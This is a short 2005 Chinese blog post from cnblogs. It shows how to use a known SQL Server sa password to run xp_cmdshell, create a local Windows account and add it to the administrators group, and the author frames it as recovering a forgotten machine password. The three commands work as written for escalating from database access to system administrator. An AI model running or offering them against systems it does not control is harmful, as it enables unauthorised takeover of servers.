Rolinson's Blog

ASP.NET , J2ME , WAP
(还有收藏网络上的技术文章,以便一急之用)

博客园 首页 新随笔 联系 订阅 管理
如果你知道某数据库sa的密码,而不知道你想操作的Windows服务器的系统管理员密码时,怎么办?
启动查询分析器,
依次执行以下三条语句:

use master
exec xp_cmdshell 'net users tempuser /add'
exec xp_cmdshell 'net localgroup administrators tempuser /add'

执行完毕后,使用tempuser就可以登录系统了。它是超级管理员权限,你可以将原Administrator的密码恢复了。

还有,其它的恢复办法,在此不作讨论

写这篇随笔纯粹是因为一个意外:
因为忘记了机器的密码,但sa的密码记得没有设置。所以想到此招。
posted on 2005-07-28 10:59  ByNow  阅读(455)  评论(0编辑  收藏  举报